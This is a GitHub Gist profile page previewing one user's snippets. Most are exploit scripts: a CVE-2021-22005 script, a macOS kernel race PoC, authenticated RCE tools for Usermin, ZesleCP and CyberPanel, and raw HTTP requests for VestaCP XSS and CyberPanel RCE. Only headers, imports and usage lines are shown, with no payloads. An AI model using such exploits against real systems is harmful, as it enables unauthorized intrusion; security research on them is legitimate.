Skip to content

Instantly share code, notes, and snippets.

Avatar
🌑

numan türle numanturle

🌑
View GitHub Profile
View CVE-2021-22005.py
import requests
import random
import string
import sys
import time
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
@numanturle
numanturle / poc.c
Created Sep 16, 2021 — forked from infernalheaven/poc.c
macOS 11.5.2/iOS 14.7.1 Kernel Race Condition poc
View poc.c
/*
Written By Pan ZhenPeng(@peterpan980927) of Alibaba Security Pandora Lab
use it on macOS: cc poc.c -o poc while True; do ./poc ; done
*/
#include <errno.h>
#include <signal.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
@numanturle
numanturle / usermin.py
Created Aug 27, 2021
Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )
View usermin.py
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )
# author: twitter.com/numanturle
# usage: usermin.py [-h] -u HOST -l LOGIN -p PASSWORD
# https://youtu.be/wiRIWFAhz24
import argparse,requests,warnings,json,re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
@numanturle
numanturle / zeslecp.py
Created Aug 27, 2021
ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)
View zeslecp.py
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )
# author: twitter.com/numanturle
# usage: zeslecp.py [-h] -u HOST -l LOGIN -p PASSWORD
# https://www.youtube.com/watch?v=5lTDTEBVq-0
import argparse,requests,warnings,json,random,string
from requests.packages.urllib3.exceptions import InsecureRequestWarning
@numanturle
numanturle / cyberpanel.py
Created Aug 27, 2021
CyberPanel - Remote Code Execution (Authenticated) ( Version 2.1 )
View cyberpanel.py
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# CyberPanel - Remote Code Execution (Authenticated) ( Version 2.1 )
# author: twitter.com/numanturle
# usage: cyberpanel.py [-h] -u HOST -l LOGIN -p PASSWORD [-f FILE]
# cyberpanel.py: error: the following arguments are required: -u/--host, -l/--login, -p/--password
import argparse,requests,warnings,json,re,base64,websocket,ssl,_thread,time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
View elasticsearch.py
import json
import sys
from time import sleep
from datetime import datetime
from elasticsearch import Elasticsearch, helpers
es = Elasticsearch("localhost:9200")
def create_index(index):
es.indices.create(index=index, ignore=400)
View sed.py
import argparse
import struct
from decimal import *
import os
from z3 import *
MAX_UNUSED_THREADS = 2
# Calculates xs128p (XorShift128Plus)
@numanturle
numanturle / frida.py
Created Jun 13, 2021
AES encryption frida
View frida.py
import time
import frida
import json
enc_cipher_hashcodes = [] #cipher objects with Cipher.ENCRYPT_MODE will be stored here
dec_cipher_hashcodes = [] #cipher objects with Cipher.ENCRYPT_MODE will be stored here
def my_message_handler(message, payload):
#mainly printing the data sent from the js code, and managing the cipher objects according to their operation mode
if message["type"] == "send":
View VestaCP_Stored_Xss.md
POST /add/ip/ HTTP/1.1
Host: 89.252.140.31:8083
Connection: close
Content-Length: 165
Cache-Control: max-age=0
Origin: https://89.252.140.31:8083
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
View CyberPanel - Authenticated Remote Code Execution - 3.md
POST /filemanager/controller HTTP/1.1
Host: HOST:8090
Connection: close
Content-Length: 175
Accept: application/json, text/plain, */*
DNT: 1
X-CSRFToken: MnbiTTzojyQye27IpaGyqfhsocdfYbtW3zVL3eI7gZk7dGmuxEYApZM2Pp59eJQZ
User-Agent: Mozilla/5.0 
Content-Type: application/json;charset=UTF-8